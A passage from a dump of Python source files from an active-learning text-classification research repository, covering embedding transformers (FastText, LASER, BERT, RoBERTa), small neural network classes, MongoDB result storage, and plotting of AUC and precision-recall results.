else:\n alg = row[2][: batch_span[0] - 1] + \"_\" + row[3]\n mean = np.mean(id_res, axis=0)\n std = np.std(id_res, axis=0)\n list_2_df.append(row[0:2] + [alg, batch_int, id_res, mean, std])\n header = [\"id\", \"dataset\", \"algorithm\", \"batch\", \"results\", \"results_mean\", \"results_std\"]\n df = pd.DataFrame(list_2_df)\n df.columns = header\n return df\n\n\ndef main():\n\n collection_results = get_collection_results()\n df = merge_resuls_and_metadata(collection_results, DATA)\n df = df[\n (df[\"algorithm\"] != \"nn_warm_start_hac_bald\")\n & (df[\"algorithm\"] != \"nn_warm_start_bald\")\n & (df[\"algorithm\"] != \"denfi_hac_bald\")\n & (df[\"algorithm\"] != \"denfi_bald\")\n ]\n\n algorithms = [\n (\n \"mc_dropout_entropy\",\n \"mc_dropout_random\",\n \"nn_min_margin\",\n 10,\n \"Fake news detection\",\n \"MC Dropout\\nHAC Entropy\",\n \"HAC\\nMin-margin\",\n \"Fake News Detection\",\n ),\n (\n \"denfi_entropy\",\n \"denfi_random\",\n \"nn_min_margin\",\n 20,\n \"Amazon Review 3, 5\",\n \"DEnFi\\nEntropy\",\n \"HAC\\nMin-margin\",\n \"Amazon Reviews 3, 5\",\n ),\n (\n \"nn_warm_start_entropy\",\n \"nn_warm_start_random\",\n \"nn_min_margin\",\n 50,\n \"Gibberish\",\n \"NN Entropy\\nWarm-start\",\n \"HAC\\nMin-margin\",\n \"Gibberish\",\n ),\n (\n \"nn_warm_start_entropy\",\n \"nn_warm_start_random\",\n \"nn_min_margin\",\n 100,\n \"Tweet_emotion_detection\",\n \"NN Entropy\\nWarm-start\",\n \"HAC\\nMin-margin\",\n \"Twitter Sentiment\",\n ),\n ]\n\n for index, (q_a_1, q_r_1, q_a_2, batch, q_data, alg_legend_1, alg_legend_2, title_category) in enumerate(\n algorithms\n ):\n\n al_1 = df[(df[\"algorithm\"] == q_a_1) & (df[\"batch\"] == batch) & (df[\"dataset\"] == q_data)]\n al_2 = df[(df[\"algorithm\"] == q_a_2) & (df[\"batch\"] == batch) & (df[\"dataset\"] == q_data)]\n\n rs_1 = df[(df[\"algorithm\"] == q_r_1) & (df[\"batch\"] == batch) & (df[\"dataset\"] == q_data)]\n\n ax = plt.subplot(1, 4, index + 1)\n\n visualize_auc_evolutions(\n ax,\n batch,\n rs_1,\n al_1,\n al_2,\n alg_legend_1,\n alg_legend_2,\n batch,\n f\"{title_category}, batch {batch}\",\n index,\n )\n\n plt.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=0.2, hspace=0.3)\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6062206625938416,
"alphanum_fraction": 0.6167840361595154,
"avg_line_length": 36.86666488647461,
"blob_id": "22131aeef7a065678a8979af9aa8502a7fa966b4",
"content_id": "b038a3898d575da4ead142214e849cc560b2e20e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10226,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 270,
"path": "/Peony_project/Peony_box/src/transformators/HuffPost_transformator.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from telnetlib import IP\nimport numpy as np\nimport requests\nimport torch\n\nfrom PeonyPackage.PeonyDb import MongoDb\nfrom Peony_box.src.transformators.generalized_transformator import Transformator\nfrom typing import List, Dict, Any, Union, Optional, Tuple, Callable\nfrom Peony_box.src.transformators.common import (\n create_hash,\n lemmatizer,\n stop_words_filter,\n tokenizer,\n)\nfrom fairseq.models.roberta import RobertaModel\nfrom tqdm import tqdm\nfrom functools import lru_cache\n\nfrom nltk.tokenize import sent_tokenize\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\nfrom bert_serving.client import BertClient\n\nCOLEECTION_NAME = \"Fasttext_pretrained_embeddings\"\nDEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nclass FastTextWordEmbeddings(Transformator):\n def __init__(self):\n super().__init__(embedding_dim=300)\n self.transformer = {}\n self.fitted: bool = False\n self.dict_length: int = 0\n self.api = MongoDb()\n\n def fit(self, instances: List[Dict[str, Any]], labels: List[str]) -> None:\n if self.fitted is False:\n print(\"transforming data...\")\n transformed_data = [_transform_text(sample) for sample in tqdm(instances)]\n tokenized_text = [\n token for text in transformed_data for token in stop_words_filter(tokenizer(text))\n ]\n distinct_tokens = set(tokenized_text)\n print(\"creating (words -> embeddings) hash map...\")\n for token in tqdm(distinct_tokens):\n embedding = self.get_embedding_from_database(token)\n if embedding is not None:\n self.transformer[token] = embedding\n print(\"creating labels encoding hash map...\")\n self.encoding_mapper = {value: index for index, value in enumerate(set(labels))}\n self.reverse_mapper = {index: value for index, value in enumerate(set(labels))}\n self.fitted = True\n self.dict_length = len(self.transformer.keys())\n\n def get_embedding_from_database(self, token: str) -> torch.Tensor:\n embedding = self.api.get_record(\n collection_name=\"Fasttext_pretrained_embeddings\",\n collection_id=11,\n hash=create_hash([token]),\n )[0]\n if embedding is None:\n return torch.tensor([0.0 for i in range(300)])\n else:\n return torch.tensor(embedding[\"record\"][\"value\"])\n\n def transform_instances(self, data: List[Dict[str, Any]]) -> List[List[torch.Tensor]]:\n transformed_data = [_transform_text(sample) for sample in tqdm(data)]\n\n with torch.no_grad():\n transformed_instances = [\n [\n _sentence_embed(\n [\n self.transformer[token]\n for token in stop_words_filter(tokenizer(sentence))\n if token in self.transformer\n ]\n + [torch.zeros((300))]\n )\n for sentence in sent_tokenize(str(text))\n ]\n for text in transformed_data\n ]\n return [embed if embed else [torch.zeros((300))] for embed in transformed_instances]\n\n def transform_labels(self, data: List[str]) -> List[int]:\n return [self.transform_label(sample) for sample in tqdm(data)]\n\n def reset(self) -> None:\n self.transformer = {}\n self.fitted = False\n self.dict_length = 0\n\n\nclass LaserWordEmbeddings(Transformator):\n\n \"\"\"\n Before you start use this transformer visit this page\n https://github.com/facebookresearch/LASER/tree/master/docker\n and run laser in docker. Use port 59012\n\n docker run -p 59012:80 -it laser python app.py\n \"\"\"\n\n def __init__(self):\n super().__init__(embedding_dim=1024)\n\n self.url = \"http://127.0.0.1:59012/vectorize\"\n self.fitted: bool = False\n\n def transform(self, text: str) -> List[torch.Tensor]:\n return requests.get(url=self.url, params={\"q\": text, \"lang\": \"en\"}).json()[\"embedding\"]\n\n def fit(self, labels: List[str]) -> None:\n if self.fitted is False:\n print(\"laser encoder is encoding on-prem...\")\n print(\"creating labels encoding hash map...\")\n self.encoding_mapper = {value: index for index, value in enumerate(set(labels))}\n self.reverse_mapper = {index: value for index, value in enumerate(set(labels))}\n self.fitted = True\n\n def transform_instances(self, data: List[Dict[str, Any]]) -> List[List[torch.Tensor]]:\n transformed_data = [_transform_text(sample) for sample in data]\n\n with torch.no_grad():\n transformed_instances = [\n [torch.tensor(tensor) for tensor in self.transform(text)] for text in tqdm(transformed_data)\n ]\n return transformed_instances\n\n def transform_labels(self, data: List[str]) -> List[int]:\n return [self.transform_label(sample) for sample in tqdm(data)]\n\n def reset(self) -> None:\n self.fitted = False\n\n\n\"\"\"\npip install bert-serving-server # server\npip install bert-serving-client # client, independent of `bert-serving-server`\nwget https://storage.googleapis.com/bert_models/2018_10_18/uncased_L-12_H-768_A-12.zip && unzip uncased_L-12_H-768_A-12.zip\nOnce we have all the files extracted in a folder, it’s time to start the BERT service:\nbert-serving-start -model_dir uncased_L-12_H-768_A-12/ -num_worker=2 -max_seq_len 50\n\"\"\"\n\n\nclass BertWordEmbeddings(Transformator):\n def __init__(self):\n super().__init__(embedding_dim=768)\n\n self.bc_client = BertClient(ip=\"localhost\")\n self.fitted: bool = False\n\n def transform(self, text: str) -> List[torch.Tensor]:\n return self.bc_client.encode(sent_tokenize(text))\n\n def fit(self, labels: List[str]) -> None:\n if self.fitted is False:\n print(\"BERT encoder is encoding on-prem...\")\n print(\"creating labels encoding hash map...\")\n self.encoding_mapper = {value: index for index, value in enumerate(set(labels))}\n self.reverse_mapper = {index: value for index, value in enumerate(set(labels))}\n self.fitted = True\n\n def transform_instances(self, data: List[Dict[str, Any]]) -> List[List[torch.Tensor]]:\n transformed_data = [_transform_text(sample) for sample in data]\n with torch.no_grad():\n transformed_instances = [\n [torch.from_numpy(tensor) for tensor in self.transform(text)]\n for text in tqdm(transformed_data)\n ]\n return transformed_instances\n\n def transform_labels(self, data: List[str]) -> List[int]:\n return [self.transform_label(sample) for sample in tqdm(data)]\n\n def reset(self) -> None:\n self.fitted = False\n\n\n\"\"\" \nwget https://dl.fbaipublicfiles.com/fairseq/models/roberta.base.tar.gz\ntar -xzvf roberta.base.tar.gz\n\"\"\"\n\n\nclass RoBERTaWordEmbeddings(Transformator):\n def __init__(self):\n super().__init__(embedding_dim=768)\n\n self.roberta = RobertaModel.from_pretrained(\"roberta.base\").to(DEVICE)\n self.fitted: bool = False\n\n def transform(self, text: str) -> List[torch.Tensor]:\n return [\n _sentence_embed(\n self.roberta.extract_features(self.roberta.encode(sentence)).squeeze(0),\n )\n for sentence in self.split_sentences(text)\n ]\n\n def fit(self, labels: List[str]) -> None:\n if self.fitted is False:\n print(\"RoBERTa encoder is encoding on-prem...\")\n print(\"creating labels encoding hash map...\")\n self.encoding_mapper = {value: index for index, value in enumerate(set(labels))}\n self.reverse_mapper = {index: value for index, value in enumerate(set(labels))}\n self.fitted = True\n\n def transform_instances(self, text_documents: List[Dict[str, Any]]) -> List[List[torch.Tensor]]:\n transformed_data = [_transform_text(text_document) for text_document in text_documents]\n with torch.no_grad():\n transformed_instances = [self.transform(text) for text in tqdm(transformed_data)]\n return transformed_instances\n\n def transform_labels(self, data: List[str]) -> List[int]:\n return [self.transform_label(sample) for sample in tqdm(data)]\n\n def reset(self) -> None:\n self.fitted = False\n\n @staticmethod\n def split_sentences(text: str) -> List[str]:\n splitted_sentences: List[str] = []\n for sentence in sent_tokenize(text if isinstance(text,str) else \"empty\"):\n if len(sentence) > 512:\n n_splits = len(sentence) // 512\n # not the best solution but should work...\n splitted_sentences += [sentence[i * 512 : (i + 1) * 512] for i in range(n_splits)]\n splitted_sentences.append(sentence[512 * n_splits :])\n else:\n splitted_sentences.append(sentence)\n return splitted_sentences\n\n\n#################################\n### Additional public methods ###\n#################################\n\n\ndef _mean_agg(embeddings: Union[torch.Tensor, List[torch.Tensor]]) -> torch.Tensor:\n if isinstance(embeddings, list):\n return torch.mean(torch.stack(embeddings, dim=0), dim=0)\n return torch.mean(embeddings, dim=0)\n\n\ndef _sentence_embed(\n embeddings: Union[torch.Tensor, List[torch.Tensor]],\n aggregator: Callable[[Union[torch.Tensor, List[torch.Tensor]]], torch.Tensor] = _mean_agg,\n) -> torch.Tensor:\n return aggregator(embeddings)\n\n\ndef _normalize(embedding: Union[np.ndarray, List[float]], dim: int) -> np.ndarray:\n epsilon = 0.1\n norm = np.linalg.norm(np.asarray(embedding))\n if norm <= epsilon:\n return np.asarray([0.0 for i in range(dim)])\n else:\n return np.asarray(embedding) / norm\n\n\ndef _transform_text(sample: Dict[str, Any]) -> str:\n\n # text = \" \".join(\n # [sample[\"record\"][\"text\"][\"title\"], sample[\"record\"][\"text\"][\"body\"]]\n # )\n # return text\n return sample[\"record\"][\"text\"][\"body\"]\n"
},
{
"alpha_fraction": 0.5799130797386169,
"alphanum_fraction": 0.5866730809211731,
"avg_line_length": 29.01449203491211,
"blob_id": "f751c3a75ba01492e1c118be6ad25d726399f220",
"content_id": "b2f9d70ee5e7d154c0dd9a4b27015d42c4e505cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2071,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 69,
"path": "/Peony_project/Peony_box/src/peony_adjusted_models/neural_nets_architecture.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\n\nfrom typing import Tuple\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\n\n\nclass NeuralNetLSTM(nn.Module):\n def __init__(\n self,\n input_dim: int,\n hidden_dim: int,\n output_dim: int,\n dropout: float = 0,\n num_of_lstm_layers: int = 1,\n ):\n super(NeuralNetLSTM, self).__init__()\n\n self.lstm = nn.LSTM(\n input_dim,\n hidden_dim,\n batch_first=True,\n bidirectional=True,\n num_layers=num_of_lstm_layers,\n dropout=0,\n )\n self.linear1 = nn.Linear(hidden_dim * 2, output_dim)\n self.relu = nn.PReLU()\n self.dropout = nn.Dropout(0.1)\n self.softmax = nn.Softmax(dim=1)\n\n def forward(self, inputs):\n\n embeddings, seq_lengths, _ = inputs\n\n total_length = embeddings.size(1)\n packed_inputs = pack_padded_sequence(embeddings, seq_lengths, batch_first=True)\n unpacked_lstm_out, _ = pad_packed_sequence(\n self.lstm(packed_inputs)[0], batch_first=True, total_length=total_length\n )\n lstm_mean = torch.mean(unpacked_lstm_out, 1)\n lstm_out = self.dropout(self.relu(lstm_mean))\n\n return self.dropout(self.softmax(self.linear1(lstm_out)))\n\n def predict(self, inputs):\n _, _, sorted_indices = inputs\n return self.forward(inputs)[sorted_indices]\n\n\nclass NeuralNet(nn.Module):\n def __init__(self, input_size: int, hidden_size: int, num_classes: int, dropout=0):\n super(NeuralNet, self).__init__()\n self.hidden = nn.Linear(input_size, hidden_size)\n self.output = nn.Linear(hidden_size, num_classes)\n self.sigmoid = nn.Sigmoid()\n self.softmax = nn.Softmax(dim=1)\n self.dropout = nn.Dropout(inplace=False)\n\n def forward(self, x):\n x = self.hidden(x)\n x = self.dropout(x)\n x = self.sigmoid(x)\n x = self.output(x)\n x = self.softmax(x)\n return x\n\n def predict(self, x):\n return self.forward(x)\n"
},
{
"alpha_fraction": 0.5105224847793579,
"alphanum_fraction": 0.5322932004928589,
"avg_line_length": 26.8383846282959,
"blob_id": "7c5a6fe18f6f744a0072b6c51d4f3351e5bd7fa9",
"content_id": "01b6e8bdfa9f35f1eee2d3437d89404b4cdae0df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5512,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 198,
"path": "/Peony_project/Peony_visualization/src/active_learning_for_text_classification/data_agg_for_article.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\n\nfrom PeonyPackage.PeonyDb import MongoDb\n\nfrom typing import Dict\n\ndev_func = np.std\nmean_func = np.mean\napi = MongoDb()\n\n\ndef create_table_str(res):\n return f\"{round(mean_func(res, axis=0)[-1][0],3)}$\\pm${round(dev_func(res, axis=0)[-1][0],3)}\"\n\n\ndef create_evolution_row(res):\n return [\n f\"{round(mean_func(res, axis=0)[0][0],3)}$\\pm${round(dev_func(res, axis=0)[0][0],3)}\",\n f\"{round(mean_func(res, axis=0)[49][0],3)}$\\pm${round(dev_func(res, axis=0)[49][0],3)}\",\n f\"{round(mean_func(res, axis=0)[99][0],3)}$\\pm${round(dev_func(res, axis=0)[99][0],3)}\",\n f\"{round(mean_func(res, axis=0)[149][0],3)}$\\pm${round(dev_func(res, axis=0)[149][0],3)}\",\n f\"{round(mean_func(res, axis=0)[199][0],3)}$\\pm${round(dev_func(res, axis=0)[199][0],3)}\",\n ]\n\n\ndef get_res_from_db(alg, acsq_func, category):\n return api.get_model_results(\n {\"model\": alg, \"acquisition_function\": acsq_func, \"category_1\": category,}\n )[0][\"results\"]\n\n\ndef create_non_nn_table():\n category = \"SPORTS\"\n\n # Random\n svm_tfidf_ran = api.get_model_results(\n {\"model\": \"svm\", \"acquisition_function\": \"random\", \"category_1\": category}\n )[0][\"results\"]\n svm_fasttext_ran = api.get_model_results(\n {\n \"model\": \"svm_fast_text_embeddings\",\n \"acquisition_function\": \"random\",\n \"category_1\": category,\n }\n )[0][\"results\"]\n rf_tfidf_ran = api.get_model_results(\n {\n \"model\": \"random_forest\",\n \"acquisition_function\": \"random\",\n \"category_1\": category,\n }\n )[0][\"results\"]\n rf_fasttext_ran = api.get_model_results(\n {\n \"model\": \"random_forest_fast_text_embeddings\",\n \"acquisition_function\": \"random\",\n \"category_1\": category,\n }\n )[0][\"results\"]\n # Entropy\n svm_tfidf_ent = api.get_model_results(\n {\"model\": \"svm\", \"acquisition_function\": \"entropy\", \"category_1\": category}\n )[0][\"results\"]\n svm_fasttext_ent = api.get_model_results(\n {\n \"model\": \"svm_fast_text_embeddings\",\n \"acquisition_function\": \"entropy\",\n \"category_1\": category,\n }\n )[0][\"results\"]\n rf_tfidf_ent = api.get_model_results(\n {\n \"model\": \"random_forest\",\n \"acquisition_function\": \"entropy\",\n \"category_1\": category,\n }\n )[0][\"results\"]\n rf_fasttext_ent = api.get_model_results(\n {\n \"model\": \"random_forest_fast_text_embeddings\",\n \"acquisition_function\": \"entropy\",\n \"category_1\": category,\n }\n )[0][\"results\"]\n\n res = [\n [\n create_table_str(svm_tfidf_ran),\n create_table_str(svm_tfidf_ent),\n create_table_str(svm_fasttext_ran),\n create_table_str(svm_fasttext_ent),\n ],\n [\n create_table_str(rf_tfidf_ran),\n create_table_str(rf_tfidf_ent),\n create_table_str(rf_fasttext_ran),\n create_table_str(rf_fasttext_ent),\n ],\n ]\n\n df = pd.DataFrame(res)\n df.columns = [\n \"TF-INF Random\",\n \"TF-INF Entropy\",\n \"Fast Text Random\",\n \"Fast Text Entopy\",\n ]\n df[\"Algorithms\"] = [\"SVM\", \"Random Forest\"]\n\n return df.set_index(\"Algorithms\")\n\n\ndef create_nn_table():\n categories = [\n \"CRIME\",\n \"SPORTS\",\n \"POLITICS\",\n \"TECH\",\n \"COLLEGE\",\n \"POSITIVE_EMOTIONS_TWEETS\",\n ]\n acq_funcs = [\"entropy\"] # \"entropy\"]\n algs = [\n \"bayesian_sgld_nn_fast_text_embeddings\",\n \"bayesian_denfi_nn_hot_start_fast_text_embeddings\",\n \"bayesian_denfi_v_2_0.3_fast_text_embeddings\",\n \"bayesian_dropout_nn_fast_text_embeddings\",\n \"bayesian_dropout_nn_hot_start_fast_text_embeddings\",\n \"bayesian_dropout_hot_start_w_noise_0.3_fast_text_embeddings\",\n ]\n dev_func = np.std\n mean_func = np.mean\n\n list_w_results = [\n [\n create_table_str(get_res_from_db(alg, acq_func, category))\n for category in categories\n for acq_func in acq_funcs\n ]\n for alg in algs\n ]\n\n df = pd.DataFrame(list_w_results)\n df.columns = [\n # \"CRIME Random\",\n \"CRIME Entropy\",\n # \"SPORTS Random\",\n \"SPORTS Entopy\",\n # \"POLITICS Random\",\n \"POLITICS Entopy\",\n # \"TECH Random\",\n \"TECH Entopy\",\n # \"EDUCATION Random\",\n \"EDUCATION Entopy\",\n # TWEETS Random\n \"TWEETS Entropy\",\n ]\n\n df[\"Algorithms\"] = [\n \"SGLD\",\n \"DENFI V1\",\n \"DENFI V2\",\n \"Dropout cold start\",\n \"Dropout hot start\",\n \"Dropout hot start w noise\",\n ]\n\n return df.set_index(\"Algorithms\")\n\n\ndef create_evloution_table():\n category = \"TECH\"\n models = [0.1, 0.2, 0.3, 0.4, 0.6, 1]\n dev_func = np.std\n mean_func = np.mean\n\n list_w_results = [\n create_evolution_row(get_res_from_db(alg, \"entropy\", category))\n for alg in [\n f\"bayesian_dropout_hot_start_w_noise_{model}_fast_text_embeddings\"\n # f\"bayesian_denfi_v_2_{model}_fast_text_embeddings\"\n for model in models\n ]\n ]\n\n df = pd.DataFrame(list_w_results)\n df.columns = [\n \"0\",\n \"50\",\n \"100\",\n \"150\",\n \"200\",\n ]\n\n df[\"Noise Variance\"] = [\"0.1\", \"0.2\", \"0.3\", \"0.4\", \"0.6\", \"1\"]\n\n return df.set_index(\"Noise Variance\")\n"
},
{
"alpha_fraction": 0.5046639442443848,
"alphanum_fraction": 0.5135135054588318,
"avg_line_length": 31.9212589263916,
"blob_id": "2f3f8227f85ef3efbbe2769d6ad90bf5d1cfc6f5",
"content_id": "296afc90125ee128be08162a8977a3667331b391",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4181,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 127,
"path": "/Peony_project/PeonyPackage/PeonyDb.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import pymongo\nimport logging\nimport numpy as np\n\nfrom pathlib import Path\nfrom typing import Callable, List, Dict, Any\nfrom tqdm import tqdm\n\n\nclass MongoDb:\n def __init__(\n self,\n db_user: str = \"User\",\n db_pass: str = \"Pass\",\n db_host: str = \"127.0.0.1\",\n db_port: int = 27017,\n ):\n\n url = f\"mongodb://{db_user}:{db_pass}@{db_host}:{db_port}/Peony-MongoDb\"\n self.client = pymongo.MongoClient(url)\n self.database = self.client[\"Peony-MongoDb\"]\n\n def load_data_to_database(\n self,\n collection_name: str,\n path_to_data: Path,\n load_data: Callable[[Path], List[dict]],\n transorm_data: Callable[[Dict[str, Any]], Dict[str, Any]],\n ) -> None:\n logging.info(f\"extracting {collection_name}... \")\n ids: list = []\n data = load_data(path_to_data)\n logging.info(\"data transformation with respect to Peony database schema...\")\n transormed_data = [transorm_data(record) for record in data]\n collection = self.database[collection_name]\n logging.info(\"uploading to Peony database...\")\n for record in tqdm(transormed_data):\n ids.append(collection.insert_one(record).inserted_id)\n logging.info(\n f\"{len(ids)} records from {len(data)} were successfully uploaded...\"\n )\n\n def load_model_results(\n self,\n model: str,\n acquisition_function: str,\n algorithm_runs: int,\n learning_step: int,\n active_learning_iterations: int,\n initial_train_data_size: int,\n validation_data_size: int,\n category_1: str,\n category_2: str,\n data: List[List[float]],\n category_1_ratio: float = 0.5,\n collection_name: str = \"models_results\",\n ) -> None:\n results_dict: dict = {\n \"model\": model,\n \"acquisition_function\": acquisition_function,\n \"algorithm_runs\": algorithm_runs,\n \"learning_step\": learning_step,\n \"active_learning_iterations\": active_learning_iterations,\n \"initial_train_data_size\": initial_train_data_size,\n \"validation_data_size\": validation_data_size,\n \"category_1\": category_1,\n \"category_2\": category_2,\n \"category_1_ratio\": category_1_ratio,\n \"category_2_ratio\": 1 - (category_1_ratio),\n \"results\": data,\n }\n collection = self.database[collection_name]\n collection.insert_one(results_dict).inserted_id\n\n def get_model_results(\n self,\n filter_dict: dict,\n collection_name: str = \"models_results\",\n skip: int = 0,\n limit: int = 10000,\n ) -> List[Dict[str, Any]]:\n return list(\n self.database[collection_name].find(\n filter=filter_dict, skip=skip, limit=limit\n )\n )\n\n def get_record(\n self,\n collection_name: str,\n collection_id: int,\n label: str = None,\n hash: str = None,\n skip: int = 0,\n limit: int = 10000,\n ) -> List[Dict[str, Any]]:\n if label is not None:\n return list(\n self.database[collection_name].find(\n filter={\n \"datasetName\": collection_name,\n \"datasetId\": collection_id,\n \"record.label\": label,\n },\n skip=skip,\n limit=limit,\n )\n )\n elif hash is not None:\n return [\n self.database[collection_name].find_one(\n filter={\n \"datasetName\": collection_name,\n \"datasetId\": collection_id,\n \"record.id\": hash,\n },\n skip=skip,\n )\n ]\n else:\n return list(\n self.database[collection_name].find(\n filter={\"datasetName\": collection_name, \"datasetId\": collection_id},\n skip=skip,\n limit=limit,\n )\n )\n"
},
{
"alpha_fraction": 0.5518560409545898,
"alphanum_fraction": 0.5701332092285156,
"avg_line_length": 27.691057205200195,
"blob_id": "00dcd3c08081aceca849a55faa45a308f1427902",
"content_id": "bbfaf8aa7fdc23d0a315736c5960f159def5dde0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7058,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 246,
"path": "/Peony_project/Peony_visualization/src/active_learning_for_text_classification/peony_visualization.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom typing import List, Dict, Tuple\nfrom scipy import interp\n\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import (\n confusion_matrix,\n roc_curve,\n auc,\n precision_recall_curve,\n average_precision_score,\n)\n\n\ndef transform_label_to_binary(\n true_vs_predicted: List[Dict[str, np.ndarray]]\n) -> Tuple[List[Dict[str, np.ndarray]], List[int]]:\n\n unique_values = np.unique(true_vs_predicted[0][\"true\"])\n if len(unique_values) > 2:\n raise Exception(\"This is not binary classification\")\n if len(unique_values) != 2:\n mapped_to_0 = unique_values[0]\n print(f\"Label {mapped_to_0} in mapped to 0, another label is mapped to 1\")\n else:\n mapped_to_0 = unique_values[0]\n mapped_to_1 = unique_values[1]\n print(f\"Label {mapped_to_0} in mapped to 0, label {mapped_to_1} in mapped to 1\")\n for record in true_vs_predicted:\n for index in range(len(record[\"true\"])):\n record[\"true\"][index] = 0 if record[\"true\"][index] == mapped_to_0 else 1\n record[\"predicted\"][index] = (\n 0 if record[\"predicted\"][index] == mapped_to_0 else 1\n )\n\n return (true_vs_predicted, unique_values)\n\n\ndef roc_and_auc_metrics(true_vs_predicted: List[Dict[str, np.ndarray]]) -> None:\n\n tprs = []\n aucs = []\n mean_fpr = np.linspace(0, 1, 100)\n plt.figure(1)\n\n for index, record in enumerate(true_vs_predicted):\n # Compute ROC curve and area the curve\n fpr, tpr, thresholds = roc_curve(record[\"true\"], record[\"predicted\"])\n tprs.append(interp(mean_fpr, fpr, tpr))\n tprs[-1][0] = 0.0\n roc_auc = auc(fpr, tpr)\n aucs.append(roc_auc)\n plt.plot(\n fpr,\n tpr,\n lw=1,\n alpha=0.3,\n label=\"ROC fold %d (AUC = %0.2f)\" % (index + 1, roc_auc),\n )\n\n plt.plot([0, 1], [0, 1], linestyle=\"--\", lw=2, color=\"r\", label=\"Chance\", alpha=0.8)\n\n mean_tpr = np.mean(tprs, axis=0)\n mean_tpr[-1] = 1.0\n mean_auc = auc(mean_fpr, mean_tpr)\n std_auc = np.std(aucs)\n plt.plot(\n mean_fpr,\n mean_tpr,\n color=\"b\",\n label=r\"Mean ROC (AUC = %0.2f $\\pm$ %0.2f)\" % (mean_auc, std_auc),\n lw=2,\n alpha=0.8,\n )\n\n std_tpr = np.std(tprs, axis=0)\n tprs_upper = np.minimum(mean_tpr + std_tpr, 1)\n tprs_lower = np.maximum(mean_tpr - std_tpr, 0)\n plt.fill_between(\n mean_fpr,\n tprs_lower,\n tprs_upper,\n color=\"grey\",\n alpha=0.2,\n label=r\"$\\pm$ 1 std. dev.\",\n )\n\n plt.xlim([-0.05, 1.05])\n plt.ylim([-0.05, 1.05])\n plt.xlabel(\"False Positive Rate\")\n plt.ylabel(\"True Positive Rate\")\n plt.title(\"Receiver operating characteristic example\")\n plt.legend(loc=\"lower right\")\n plt.show()\n\n\ndef get_confusion_matrix(true_vs_predicted: List[Dict[str, np.ndarray]]) -> None:\n ...\n\n\ndef plot_precision_recall_curve(true_vs_predicted: List[Dict[str, np.ndarray]]) -> None:\n\n plt.figure(2)\n\n cross_val_average_precision: List[float] = []\n cross_val_precision_recall: List[tuple] = []\n max_step_prec: int = 0\n max_step_recall: int = 0\n\n for index, record in enumerate(true_vs_predicted):\n\n average_precision = average_precision_score(record[\"true\"], record[\"predicted\"])\n cross_val_average_precision.append(average_precision)\n\n precision, recall, _ = precision_recall_curve(\n record[\"true\"], record[\"predicted\"]\n )\n cross_val_precision_recall.append((precision, recall))\n max_step_prec = (\n len(precision) if len(precision) > max_step_prec else max_step_prec\n )\n max_step_recall = (\n len(precision) if len(recall) > max_step_recall else max_step_recall\n )\n\n plt.plot(\n recall,\n precision,\n color=\"b\",\n lw=1,\n alpha=0.3,\n label=\"PR fold %d (AP = %0.2f)\" % (index + 1, average_precision),\n )\n plt.fill_between(recall, precision, color=\"b\", alpha=0.01)\n\n mean_precision = np.mean(\n [\n fold_precision[0]\n for fold_precision in cross_val_precision_recall\n if len(fold_precision[0]) == max_step_prec\n ],\n axis=0,\n )\n mean_recall = np.mean(\n [\n fold_recall[1]\n for fold_recall in cross_val_precision_recall\n if len(fold_recall[0]) == max_step_recall\n ],\n axis=0,\n )\n\n mean_average_precision = sum(cross_val_average_precision) / len(\n cross_val_average_precision\n )\n plt.plot(\n mean_recall,\n mean_precision,\n linestyle=\"--\",\n color=\"k\",\n lw=1,\n label=\"Mean PR (mean AP = %0.2f)\" % (mean_average_precision),\n )\n\n plt.xlabel(\"Recall\")\n plt.ylabel(\"Precision\")\n plt.ylim([0.0, 1.05])\n plt.xlim([0.0, 1.0])\n plt.title(\n \"Cross validation 2-class Precision-Recall curves: Mean AP={0:0.2f}\".format(\n mean_average_precision\n )\n )\n\n plt.legend(loc=\"lower left\")\n plt.show()\n\n\ndef visualize_two_auc_evolutions(\n first_auc_seq: np.ndarray, second_auc_seq: np.ndarray\n) -> None:\n\n plt.figure(3)\n\n first_mean = np.mean(first_auc_seq, axis=0)\n first_std = np.std(first_auc_seq, axis=0)\n\n second_mean = np.mean(second_auc_seq, axis=0)\n second_std = np.std(second_auc_seq, axis=0)\n\n plt.plot(\n first_mean,\n linestyle=\"-\",\n color=\"r\",\n lw=1,\n label=\"Random Selection AUC evolution mean\",\n )\n plt.plot(first_mean + first_std, linestyle=\"-\", color=\"r\", alpha=0.2)\n plt.plot(first_mean - first_std, linestyle=\"-\", color=\"r\", alpha=0.2)\n\n # plt.fill_between(\n # first_mean.tolist,\n # (first_mean + first_std).tolist(),\n # (first_mean - first_std).tolist(),\n # color=\"r\",\n # alpha=0.2,\n # label=\"1 std. dev.\",\n # )\n\n plt.plot(\n second_mean,\n linestyle=\"-\",\n color=\"g\",\n lw=1,\n label=\"Active Learning AUC evolution mean\",\n )\n plt.plot(second_mean + second_std, linestyle=\"-\", color=\"g\", alpha=0.2)\n plt.plot(second_mean - second_std, linestyle=\"-\", color=\"g\", alpha=0.2)\n\n # plt.fill_between(\n # first_mean.tolist,\n # 